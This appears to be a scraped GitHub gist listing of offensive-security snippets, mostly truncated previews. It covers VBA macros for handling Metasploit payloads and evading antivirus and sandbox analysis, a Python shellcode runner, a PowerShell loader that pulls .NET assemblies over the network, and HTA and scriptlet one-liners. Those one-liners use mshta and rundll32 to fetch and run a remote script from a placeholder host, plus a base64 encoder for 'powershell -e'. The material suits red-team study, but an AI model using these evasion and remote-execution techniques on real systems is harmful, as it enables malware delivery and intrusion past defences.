View mergeVBAPayload.vba
' Sometimes, after generating a metasploit payload with vba output format, you get a payload which is too long
' for the vba line continuation limit (24 line continuation max)
' So you have to split the payload in two arrays, then merge them again.
' This snippet shows the simple trick
Dim PayloadPart1, PayloadPart2, Final As Variant
PayloadPart1 = Array ( whatever metasploit first part payload with line _
continuation _
View macro_evade_av_01.vba
' Author Arno0x0x -
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
' Only then, a new Office Word object is instantiated to load this Office Template and run a specific macro from it.
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers
View officeEmbeddedFileDecode.vba
' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload
' This macro searches for a marker paragraph, namely "marker" in the example below
' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
' a local file.
' Example, in the word document:
' marker
' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 ....
# -*- coding: utf8 -*-
# This script executes a Windows shellcode within python process memory.
# Author: Arno0x0x, Twitter: @Arno0x0x
# Create a windows executable: pyinstaller --onefile --noconsole
from ctypes import *
# -*- coding: utf8 -*-
# Author: Arno0x0x, Twitter: @Arno0x0x
import argparse
Arno0x / loadAssembly_method1.ps1
Last active Oct 9, 2018
Load a .Net assembly dynamically from PowerShell
View loadAssembly_method1.ps1
$Source = @"
using System;
using System.Net;
using System.Reflection;
namespace LoadAssembly {
public static class LoadAssembly {
public static void load() {
WebClient webclient = new WebClient();
IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
if (defaultProxy != null) {
Arno0x / calc.hta
Created Nov 17, 2017
HTML Application example to be executed by mshta.exe
View calc.hta
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
Arno0x / scriptlet.sct
Created Nov 17, 2017
Scriptlet that can be executed by mshta or rundll32 for arbitrary code execution
View scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
echo "Base64 encoded, ready to be used with 'powershell -e':"
echo "$1" | iconv --to-code UTF-16LE | base64 -w 0
Arno0x / service.cs
Created Sep 5, 2017
A basic Windows service written in .NET/C#
View service.cs
Creates a basic Windows Service using .Net framework.
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs
Create the service with name "Service":
sc create Service type=own binpath= c:\Path\To\service.exe
Start the service: